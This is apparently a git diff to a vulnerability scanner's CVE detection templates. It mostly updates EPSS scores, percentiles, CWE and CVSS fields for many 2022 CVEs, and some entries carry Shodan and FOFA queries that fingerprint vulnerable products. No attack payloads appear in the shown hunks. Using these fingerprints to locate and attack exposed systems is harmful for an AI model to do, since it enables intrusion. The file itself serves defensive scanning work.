cvss-score: 6.5 cve-id: CVE-2022-37299 cwe-id: CWE-22 - epss-score: 0.00524 + epss-score: 0.00519 cpe: cpe:2.3:a:shirne_cms_project:shirne_cms:1.2.0:*:*:*:*:*:*:* + epss-percentile: 0.73813 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-3768.yaml b/http/cves/2022/CVE-2022-3768.yaml index bfce224721..5efa90291e 100644 --- a/http/cves/2022/CVE-2022-3768.yaml +++ b/http/cves/2022/CVE-2022-3768.yaml @@ -17,8 +17,9 @@ info: cvss-score: 8.8 cve-id: CVE-2022-3768 cwe-id: CWE-89 - epss-score: 0.02248 + epss-score: 0.02138 cpe: cpe:2.3:a:wpsmartcontracts:wpsmartcontracts:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.87828 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-3800.yaml b/http/cves/2022/CVE-2022-3800.yaml index f6eb713d4c..9c45e18369 100644 --- a/http/cves/2022/CVE-2022-3800.yaml +++ b/http/cves/2022/CVE-2022-3800.yaml @@ -15,8 +15,9 @@ info: cvss-score: 8.8 cve-id: CVE-2022-3800 cwe-id: CWE-89,CWE-707 - epss-score: 0.06354 + epss-score: 0.04587 cpe: cpe:2.3:a:ibax:go-ibax:-:*:*:*:*:*:*:* + epss-percentile: 0.91474 metadata: max-request: 1 vendor: ibax diff --git a/http/cves/2022/CVE-2022-38295.yaml b/http/cves/2022/CVE-2022-38295.yaml index 37f7dd85fb..5d5cea807e 100644 --- a/http/cves/2022/CVE-2022-38295.yaml +++ b/http/cves/2022/CVE-2022-38295.yaml @@ -14,8 +14,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-38295 cwe-id: CWE-79 - epss-score: 0.00086 + epss-score: 0.00533 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* + epss-percentile: 0.74162 metadata: max-request: 3 verified: true diff --git a/http/cves/2022/CVE-2022-38296.yaml b/http/cves/2022/CVE-2022-38296.yaml index 08dacfff28..cba603dc48 100644 --- a/http/cves/2022/CVE-2022-38296.yaml +++ b/http/cves/2022/CVE-2022-38296.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-38296 cwe-id: CWE-434 - epss-score: 0.01076 + epss-score: 0.01161 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* + epss-percentile: 0.8311 metadata: max-request: 3 verified: true diff --git a/http/cves/2022/CVE-2022-38463.yaml b/http/cves/2022/CVE-2022-38463.yaml index 5845b25386..5c243655e9 100644 --- a/http/cves/2022/CVE-2022-38463.yaml +++ b/http/cves/2022/CVE-2022-38463.yaml @@ -14,8 +14,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-38463 cwe-id: CWE-79 - epss-score: 0.00126 + epss-score: 0.00122 cpe: cpe:2.3:a:servicenow:servicenow:san_diego:patch_4:*:*:*:*:*:* + epss-percentile: 0.45824 metadata: max-request: 1 shodan-query: http.title:"ServiceNow" diff --git a/http/cves/2022/CVE-2022-38467.yaml b/http/cves/2022/CVE-2022-38467.yaml index b40d444c30..4552c75486 100644 --- a/http/cves/2022/CVE-2022-38467.yaml +++ b/http/cves/2022/CVE-2022-38467.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-79 epss-score: 0.00064 cpe: cpe:2.3:a:crmperks:crm_perks_forms:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.26173 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-38553.yaml b/http/cves/2022/CVE-2022-38553.yaml index 7d0fe8e3ac..9e86c776ce 100644 --- a/http/cves/2022/CVE-2022-38553.yaml +++ b/http/cves/2022/CVE-2022-38553.yaml @@ -17,8 +17,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-38553 cwe-id: CWE-79 - epss-score: 0.00084 + epss-score: 0.001 cpe: cpe:2.3:a:creativeitem:academy_learning_management_system:*:*:*:*:*:*:*:* + epss-percentile: 0.40523 metadata: max-request: 1 google-query: intext:"Study any topic, anytime" diff --git a/http/cves/2022/CVE-2022-38637.yaml b/http/cves/2022/CVE-2022-38637.yaml index 324006f561..a3dc39d720 100644 --- a/http/cves/2022/CVE-2022-38637.yaml +++ b/http/cves/2022/CVE-2022-38637.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-38637 cwe-id: CWE-89 - epss-score: 0.01174 + epss-score: 0.01481 cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.8515 metadata: max-request: 1 shodan-query: http.html:"Hospital Management System" diff --git a/http/cves/2022/CVE-2022-38794.yaml b/http/cves/2022/CVE-2022-38794.yaml index d21f4235c8..1f6cd9cd95 100644 --- a/http/cves/2022/CVE-2022-38794.yaml +++ b/http/cves/2022/CVE-2022-38794.yaml @@ -14,8 +14,9 @@ info: cvss-score: 7.5 cve-id: CVE-2022-38794 cwe-id: CWE-22 - epss-score: 0.00287 + epss-score: 0.00318 cpe: cpe:2.3:a:zaver_project:zaver:*:*:*:*:*:*:*:* + epss-percentile: 0.66648 metadata: max-request: 1 vendor: zaver_project diff --git a/http/cves/2022/CVE-2022-38817.yaml b/http/cves/2022/CVE-2022-38817.yaml index 8d6ad30b07..08cb37b985 100644 --- a/http/cves/2022/CVE-2022-38817.yaml +++ b/http/cves/2022/CVE-2022-38817.yaml @@ -15,8 +15,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-38817 - epss-score: 0.00512 + cwe-id: CWE-306 + epss-score: 0.0075 cpe: cpe:2.3:a:linuxfoundation:dapr_dashboard:*:*:*:*:*:*:*:* + epss-percentile: 0.78669 metadata: max-request: 3 shodan-query: http.title:"Dapr Dashboard" diff --git a/http/cves/2022/CVE-2022-38870.yaml b/http/cves/2022/CVE-2022-38870.yaml index 3fe0b3c42e..3c143a58cb 100644 --- a/http/cves/2022/CVE-2022-38870.yaml +++ b/http/cves/2022/CVE-2022-38870.yaml @@ -14,8 +14,9 @@ info: cvss-score: 7.5 cve-id: CVE-2022-38870 cwe-id: CWE-306 - epss-score: 0.00327 + epss-score: 0.00334 cpe: cpe:2.3:a:free5gc:free5gc:3.2.1:*:*:*:*:*:*:* + epss-percentile: 0.67526 metadata: max-request: 1 shodan-query: http.title:"free5GC Web Console" diff --git a/http/cves/2022/CVE-2022-3908.yaml b/http/cves/2022/CVE-2022-3908.yaml index c24b663a8b..63c895855b 100644 --- a/http/cves/2022/CVE-2022-3908.yaml +++ b/http/cves/2022/CVE-2022-3908.yaml @@ -16,8 +16,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-3908 cwe-id: CWE-79 - epss-score: 0.00064 + epss-score: 0.00071 cpe: cpe:2.3:a:helloprint:helloprint:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.29012 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-39195.yaml b/http/cves/2022/CVE-2022-39195.yaml index 61f5b6ca4d..b465fbedd1 100644 --- a/http/cves/2022/CVE-2022-39195.yaml +++ b/http/cves/2022/CVE-2022-39195.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00125 cpe: cpe:2.3:a:lsoft:listserv:17.0:*:*:*:*:*:*:* + epss-percentile: 0.46238 metadata: max-request: 2 shodan-query: http.html:"LISTSERV" diff --git a/http/cves/2022/CVE-2022-3933.yaml b/http/cves/2022/CVE-2022-3933.yaml index 1621350e6f..28f0a14b6c 100644 --- a/http/cves/2022/CVE-2022-3933.yaml +++ b/http/cves/2022/CVE-2022-3933.yaml @@ -16,8 +16,9 @@ info: cvss-score: 5.4 cve-id: CVE-2022-3933 cwe-id: CWE-79 - epss-score: 0.0007 + epss-score: 0.00077 cpe: cpe:2.3:a:g5theme:essential_real_estate:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.31826 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-3934.yaml b/http/cves/2022/CVE-2022-3934.yaml index c659733ae6..395e187efb 100644 --- a/http/cves/2022/CVE-2022-3934.yaml +++ b/http/cves/2022/CVE-2022-3934.yaml @@ -15,8 +15,9 @@ info: cvss-score: 5.4 cve-id: CVE-2022-3934 cwe-id: CWE-79 - epss-score: 0.0007 + epss-score: 0.00077 cpe: cpe:2.3:a:mehanoid:flat_pm:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.31826 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-3980.yaml b/http/cves/2022/CVE-2022-3980.yaml index 726407c97b..2f12dee3f9 100644 --- a/http/cves/2022/CVE-2022-3980.yaml +++ b/http/cves/2022/CVE-2022-3980.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-3980 cwe-id: CWE-611 - epss-score: 0.33654 + epss-score: 0.75202 cpe: cpe:2.3:a:sophos:mobile:*:*:*:*:*:*:*:* + epss-percentile: 0.97737 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-3982.yaml b/http/cves/2022/CVE-2022-3982.yaml index 75913ac144..9b049fb9eb 100644 --- a/http/cves/2022/CVE-2022-3982.yaml +++ b/http/cves/2022/CVE-2022-3982.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-3982 cwe-id: CWE-434 - epss-score: 0.96022 + epss-score: 0.40713 cpe: cpe:2.3:a:wpdevart:booking_calendar:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.96796 metadata: max-request: 3 verified: true diff --git a/http/cves/2022/CVE-2022-39952.yaml b/http/cves/2022/CVE-2022-39952.yaml index 3a5d68d57e..e373582191 100644 --- a/http/cves/2022/CVE-2022-39952.yaml +++ b/http/cves/2022/CVE-2022-39952.yaml @@ -16,9 +16,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-39952 - cwe-id: CWE-610 - epss-score: 0.96372 + cwe-id: CWE-668 + epss-score: 0.9679 cpe: cpe:2.3:a:fortinet:fortinac:*:*:*:*:*:*:*:* + epss-percentile: 0.99533 metadata: max-request: 1 shodan-query: title:"FortiNAC" diff --git a/http/cves/2022/CVE-2022-39960.yaml b/http/cves/2022/CVE-2022-39960.yaml index 1c5326533d..2f8c487390 100644 --- a/http/cves/2022/CVE-2022-39960.yaml +++ b/http/cves/2022/CVE-2022-39960.yaml @@ -15,8 +15,9 @@ info: cvss-score: 5.3 cve-id: CVE-2022-39960 cwe-id: CWE-862 - epss-score: 0.29823 + epss-score: 0.24986 cpe: cpe:2.3:a:netic:group_export:*:*:*:*:*:jira:*:* + epss-percentile: 0.96046 metadata: max-request: 1 shodan-query: http.component:"Atlassian Jira" diff --git a/http/cves/2022/CVE-2022-39986.yaml b/http/cves/2022/CVE-2022-39986.yaml index 0e3804f089..646caeb040 100644 --- a/http/cves/2022/CVE-2022-39986.yaml +++ b/http/cves/2022/CVE-2022-39986.yaml @@ -10,16 +10,23 @@ info: - https://packetstormsecurity.com/files/174190/RaspAP-2.8.7-Unauthenticated-Command-Injection.html - https://nvd.nist.gov/vuln/detail/CVE-2022-39986 - https://medium.com/@ismael0x00/multiple-vulnerabilities-in-raspap-3c35e78809f2 + - http://packetstormsecurity.com/files/174190/RaspAP-2.8.7-Unauthenticated-Command-Injection.html + - https://github.com/RaspAP/raspap-webgui/blob/master/ajax/openvpn/activate_ovpncfg.php classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-39986 cwe-id: CWE-77 + epss-score: 0.60136 + cpe: cpe:2.3:a:raspap:raspap:*:*:*:*:*:*:*:* + epss-percentile: 0.97326 metadata: max-request: 1 shodan-query: http.favicon.hash:-1465760059 verified: true - tags: cve,cve2020,raspap,rce + vendor: raspap + product: raspap + tags: packetstorm,cve,cve2020,raspap,rce http: - raw: diff --git a/http/cves/2022/CVE-2022-40022.yaml b/http/cves/2022/CVE-2022-40022.yaml index b58988ea58..54883a9c30 100644 --- a/http/cves/2022/CVE-2022-40022.yaml +++ b/http/cves/2022/CVE-2022-40022.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-40022 cwe-id: CWE-77 - epss-score: 0.75757 + epss-score: 0.70919 cpe: cpe:2.3:o:microchip:syncserver_s650_firmware:-:*:*:*:*:*:*:* + epss-percentile: 0.9761 metadata: max-request: 1 shodan-query: html:"Symmetricom SyncServer" diff --git a/http/cves/2022/CVE-2022-40083.yaml b/http/cves/2022/CVE-2022-40083.yaml index 2e3e8626e7..30c52a8b5f 100644 --- a/http/cves/2022/CVE-2022-40083.yaml +++ b/http/cves/2022/CVE-2022-40083.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.6 cve-id: CVE-2022-40083 cwe-id: CWE-601 - epss-score: 0.01114 + epss-score: 0.01662 cpe: cpe:2.3:a:labstack:echo:4.8.0:*:*:*:*:*:*:* + epss-percentile: 0.86042 metadata: max-request: 1 vendor: labstack diff --git a/http/cves/2022/CVE-2022-40127.yaml b/http/cves/2022/CVE-2022-40127.yaml index d9350fba4b..66d8ceffff 100644 --- a/http/cves/2022/CVE-2022-40127.yaml +++ b/http/cves/2022/CVE-2022-40127.yaml @@ -17,8 +17,9 @@ info: cvss-score: 8.8 cve-id: CVE-2022-40127 cwe-id: CWE-94 - epss-score: 0.19379 + epss-score: 0.17166 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* + epss-percentile: 0.95397 metadata: max-request: 3 verified: true diff --git a/http/cves/2022/CVE-2022-40359.yaml b/http/cves/2022/CVE-2022-40359.yaml index 159d9db68f..b9deab4006 100644 --- a/http/cves/2022/CVE-2022-40359.yaml +++ b/http/cves/2022/CVE-2022-40359.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-40359 cwe-id: CWE-79 - epss-score: 0.00071 + epss-score: 0.00078 cpe: cpe:2.3:a:kfm_project:kfm:*:*:*:*:*:*:*:* + epss-percentile: 0.32136 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-4050.yaml b/http/cves/2022/CVE-2022-4050.yaml index 873b397a08..59185c4c54 100644 --- a/http/cves/2022/CVE-2022-4050.yaml +++ b/http/cves/2022/CVE-2022-4050.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-4050 cwe-id: CWE-89 - epss-score: 0.16485 + epss-score: 0.31266 cpe: cpe:2.3:a:beardev:joomsport:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.96404 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-4057.yaml b/http/cves/2022/CVE-2022-4057.yaml index 802840a4a5..a60bd5394e 100644 --- a/http/cves/2022/CVE-2022-4057.yaml +++ b/http/cves/2022/CVE-2022-4057.yaml @@ -14,9 +14,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-4057 - cwe-id: CWE-425,CWE-200 + cwe-id: CWE-425 epss-score: 0.00177 cpe: cpe:2.3:a:optimizingmatters:autooptimize:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.54176 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-4060.yaml b/http/cves/2022/CVE-2022-4060.yaml index ddc373e915..791b863222 100644 --- a/http/cves/2022/CVE-2022-4060.yaml +++ b/http/cves/2022/CVE-2022-4060.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-94 epss-score: 0.05043 cpe: cpe:2.3:a:odude:user_post_gallery:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.91883 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-4063.yaml b/http/cves/2022/CVE-2022-4063.yaml index a532f7e648..9e200b19ac 100644 --- a/http/cves/2022/CVE-2022-4063.yaml +++ b/http/cves/2022/CVE-2022-4063.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-4063 cwe-id: CWE-22 - epss-score: 0.00727 + epss-score: 0.00819 cpe: cpe:2.3:a:pluginus:inpost_gallery:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.79674 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-40684.yaml b/http/cves/2022/CVE-2022-40684.yaml index 3fed51b292..0db36c1329 100644 --- a/http/cves/2022/CVE-2022-40684.yaml +++ b/http/cves/2022/CVE-2022-40684.yaml @@ -16,9 +16,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-40684 - cwe-id: CWE-306 - epss-score: 0.96776 + cwe-id: CWE-287 + epss-score: 0.96782 cpe: cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:* + epss-percentile: 0.9953 metadata: max-request: 2 vendor: fortinet diff --git a/http/cves/2022/CVE-2022-40734.yaml b/http/cves/2022/CVE-2022-40734.yaml index 86dc78ac57..cd34457517 100644 --- a/http/cves/2022/CVE-2022-40734.yaml +++ b/http/cves/2022/CVE-2022-40734.yaml @@ -14,8 +14,9 @@ info: cvss-score: 6.5 cve-id: CVE-2022-40734 cwe-id: CWE-22 - epss-score: 0.01294 + epss-score: 0.00783 cpe: cpe:2.3:a:unisharp:laravel_filemanager:*:*:*:*:*:*:*:* + epss-percentile: 0.79184 metadata: max-request: 2 shodan-query: http.html:"Laravel Filemanager" diff --git a/http/cves/2022/CVE-2022-40843.yaml b/http/cves/2022/CVE-2022-40843.yaml index fef7fc5688..4353ea6ff2 100644 --- a/http/cves/2022/CVE-2022-40843.yaml +++ b/http/cves/2022/CVE-2022-40843.yaml @@ -3,19 +3,24 @@ id: CVE-2022-40843 info: name: Tenda AC1200 V-W15Ev2 - Authentication Bypass author: gy741 - severity: critical + severity: medium description: | The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router's login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router's file, which contains the MD5 password of the Administrator's user account. This vulnerability exists within the local web and hosted remote management console. reference: - https://boschko.ca/tenda_ac1200_router - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40843 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L - cvss-score: 9.9 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N + cvss-score: 4.9 cve-id: CVE-2022-40843 cwe-id: CWE-287 + epss-score: 0.5155 + cpe: cpe:2.3:o:tenda:w15e_firmware:15.11.0.10\(1576\):*:*:*:*:*:*:* + epss-percentile: 0.97125 metadata: max-request: 1 + vendor: tenda + product: w15e_firmware tags: cve,cve2022,tenda,auth-bypass,router,iot http: diff --git a/http/cves/2022/CVE-2022-40879.yaml b/http/cves/2022/CVE-2022-40879.yaml index 8c145e2552..b031d5b251 100644 --- a/http/cves/2022/CVE-2022-40879.yaml +++ b/http/cves/2022/CVE-2022-40879.yaml @@ -14,8 +14,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-40879 cwe-id: CWE-79 - epss-score: 0.0012 + epss-score: 0.02057 cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* + epss-percentile: 0.87582 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-40881.yaml b/http/cves/2022/CVE-2022-40881.yaml index f1d5f5452c..e86ddbd468 100644 --- a/http/cves/2022/CVE-2022-40881.yaml +++ b/http/cves/2022/CVE-2022-40881.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-40881 cwe-id: CWE-77 - epss-score: 0.95017 + epss-score: 0.94859 cpe: cpe:2.3:o:contec:solarview_compact_firmware:6.00:*:*:*:*:*:*:* + epss-percentile: 0.98977 metadata: max-request: 1 shodan-query: http.favicon.hash:"-244067125" diff --git a/http/cves/2022/CVE-2022-4117.yaml b/http/cves/2022/CVE-2022-4117.yaml index 6869cd0345..4539b8fe6c 100644 --- a/http/cves/2022/CVE-2022-4117.yaml +++ b/http/cves/2022/CVE-2022-4117.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-4117 cwe-id: CWE-89 - epss-score: 0.04839 + epss-score: 0.12065 cpe: cpe:2.3:a:iws-geo-form-fields_project:iws-geo-form-fields:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.94628 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-4140.yaml b/http/cves/2022/CVE-2022-4140.yaml index 9615b67c89..b0fafeced2 100644 --- a/http/cves/2022/CVE-2022-4140.yaml +++ b/http/cves/2022/CVE-2022-4140.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.5 cve-id: CVE-2022-4140 cwe-id: CWE-552 - epss-score: 0.01568 + epss-score: 0.00516 cpe: cpe:2.3:a:collne:welcart_e-commerce:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.73753 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-41441.yaml b/http/cves/2022/CVE-2022-41441.yaml index e22adc0138..fe6314c609 100644 --- a/http/cves/2022/CVE-2022-41441.yaml +++ b/http/cves/2022/CVE-2022-41441.yaml @@ -17,8 +17,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-41441 cwe-id: CWE-79 - epss-score: 0.00109 + epss-score: 0.00104 cpe: cpe:2.3:a:reqlogic:reqlogic:11.3:*:*:*:*:*:*:* + epss-percentile: 0.41863 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-41473.yaml b/http/cves/2022/CVE-2022-41473.yaml index ec806e4f82..fce42916a7 100644 --- a/http/cves/2022/CVE-2022-41473.yaml +++ b/http/cves/2022/CVE-2022-41473.yaml @@ -14,8 +14,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-41473 cwe-id: CWE-79 - epss-score: 0.00085 + epss-score: 0.0332 cpe: cpe:2.3:a:rpcms:rpcms:3.0.2:*:*:*:*:*:*:* + epss-percentile: 0.9008 metadata: max-request: 1 shodan-query: http.html:"RPCMS" diff --git a/http/cves/2022/CVE-2022-41840.yaml b/http/cves/2022/CVE-2022-41840.yaml index fbd754f80d..a8b3a2dfb8 100644 --- a/http/cves/2022/CVE-2022-41840.yaml +++ b/http/cves/2022/CVE-2022-41840.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-41840 cwe-id: CWE-22 - epss-score: 0.00308 + epss-score: 0.00635 cpe: cpe:2.3:a:collne:welcart_e-commerce:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.76449 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-42094.yaml b/http/cves/2022/CVE-2022-42094.yaml index 1422bf10e8..c1f0e4ac37 100644 --- a/http/cves/2022/CVE-2022-42094.yaml +++ b/http/cves/2022/CVE-2022-42094.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00564 cpe: cpe:2.3:a:backdropcms:backdrop:1.23.0:*:*:*:*:*:*:* + epss-percentile: 0.74906 metadata: max-request: 4 verified: true diff --git a/http/cves/2022/CVE-2022-42095.yaml b/http/cves/2022/CVE-2022-42095.yaml index 9fc142162c..65e69c32b5 100644 --- a/http/cves/2022/CVE-2022-42095.yaml +++ b/http/cves/2022/CVE-2022-42095.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00431 cpe: cpe:2.3:a:backdropcms:backdrop_cms:1.23.0:*:*:*:*:*:*:* + epss-percentile: 0.71305 metadata: max-request: 5 verified: true diff --git a/http/cves/2022/CVE-2022-42096.yaml b/http/cves/2022/CVE-2022-42096.yaml index 1ff8359e9b..8bf7a597be 100644 --- a/http/cves/2022/CVE-2022-42096.yaml +++ b/http/cves/2022/CVE-2022-42096.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00569 cpe: cpe:2.3:a:backdropcms:backdrop_cms:1.23.0:*:*:*:*:*:*:* + epss-percentile: 0.74992 metadata: max-request: 5 verified: true diff --git a/http/cves/2022/CVE-2022-42233.yaml b/http/cves/2022/CVE-2022-42233.yaml index a98f31e05f..1f4e1e4294 100644 --- a/http/cves/2022/CVE-2022-42233.yaml +++ b/http/cves/2022/CVE-2022-42233.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-42233 cwe-id: CWE-287 - epss-score: 0.91121 + epss-score: 0.89148 cpe: cpe:2.3:o:tenda:11n_firmware:5.07.33_cn:*:*:*:*:*:*:* + epss-percentile: 0.98301 metadata: max-request: 1 fofa-query: product=="Tenda-11N-Wireless-AP" diff --git a/http/cves/2022/CVE-2022-4260.yaml b/http/cves/2022/CVE-2022-4260.yaml index 80789434ea..42fbb10cdb 100644 --- a/http/cves/2022/CVE-2022-4260.yaml +++ b/http/cves/2022/CVE-2022-4260.yaml @@ -16,8 +16,9 @@ info: cvss-score: 4.8 cve-id: CVE-2022-4260 cwe-id: CWE-79 - epss-score: 0.00071 + epss-score: 0.00078 cpe: cpe:2.3:a:wp-ban_project:wp-ban:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.32136 metadata: max-request: 4 verified: true diff --git a/http/cves/2022/CVE-2022-42746.yaml b/http/cves/2022/CVE-2022-42746.yaml index bfaa50156e..f68200b3a7 100644 --- a/http/cves/2022/CVE-2022-42746.yaml +++ b/http/cves/2022/CVE-2022-42746.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00071 cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:* + epss-percentile: 0.28972 metadata: max-request: 1 shodan-query: http.html:"CandidATS" diff --git a/http/cves/2022/CVE-2022-42747.yaml b/http/cves/2022/CVE-2022-42747.yaml index 1ad514a408..521378ff57 100644 --- a/http/cves/2022/CVE-2022-42747.yaml +++ b/http/cves/2022/CVE-2022-42747.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00071 cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:* + epss-percentile: 0.28972 metadata: max-request: 1 shodan-query: http.html:"CandidATS" diff --git a/http/cves/2022/CVE-2022-42748.yaml b/http/cves/2022/CVE-2022-42748.yaml index eca95e4cfe..4793e23357 100644 --- a/http/cves/2022/CVE-2022-42748.yaml +++ b/http/cves/2022/CVE-2022-42748.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00071 cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:* + epss-percentile: 0.28972 metadata: max-request: 1 shodan-query: http.html:"CandidATS" diff --git a/http/cves/2022/CVE-2022-42749.yaml b/http/cves/2022/CVE-2022-42749.yaml index 38996496f7..63ec5e3c0b 100644 --- a/http/cves/2022/CVE-2022-42749.yaml +++ b/http/cves/2022/CVE-2022-42749.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00071 cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:* + epss-percentile: 0.28972 metadata: max-request: 1 shodan-query: http.html:"CandidATS" diff --git a/http/cves/2022/CVE-2022-4295.yaml b/http/cves/2022/CVE-2022-4295.yaml index 13640c4386..740754517b 100644 --- a/http/cves/2022/CVE-2022-4295.yaml +++ b/http/cves/2022/CVE-2022-4295.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00064 cpe: cpe:2.3:a:appjetty:show_all_comments:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.26173 metadata: max-request: 1 publicwww-query: /wp-content/plugins/show-all-comments-in-one-page diff --git a/http/cves/2022/CVE-2022-4301.yaml b/http/cves/2022/CVE-2022-4301.yaml index 7d972cda67..9a847e8eee 100644 --- a/http/cves/2022/CVE-2022-4301.yaml +++ b/http/cves/2022/CVE-2022-4301.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-4301 cwe-id: CWE-79 - epss-score: 0.00064 + epss-score: 0.00071 cpe: cpe:2.3:a:sunshinephotocart:sunshine_photo_cart:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.29012 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-43014.yaml b/http/cves/2022/CVE-2022-43014.yaml index 3f667ed2c6..4ccf4ab5ab 100644 --- a/http/cves/2022/CVE-2022-43014.yaml +++ b/http/cves/2022/CVE-2022-43014.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00071 cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* + epss-percentile: 0.29005 metadata: max-request: 2 shodan-query: title:"OpenCATS" diff --git a/http/cves/2022/CVE-2022-43015.yaml b/http/cves/2022/CVE-2022-43015.yaml index 2ce1d484de..9af858dd46 100644 --- a/http/cves/2022/CVE-2022-43015.yaml +++ b/http/cves/2022/CVE-2022-43015.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00071 cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* + epss-percentile: 0.29005 metadata: max-request: 2 shodan-query: title:"OpenCATS" diff --git a/http/cves/2022/CVE-2022-43016.yaml b/http/cves/2022/CVE-2022-43016.yaml index ccfdf44011..63bebdf198 100644 --- 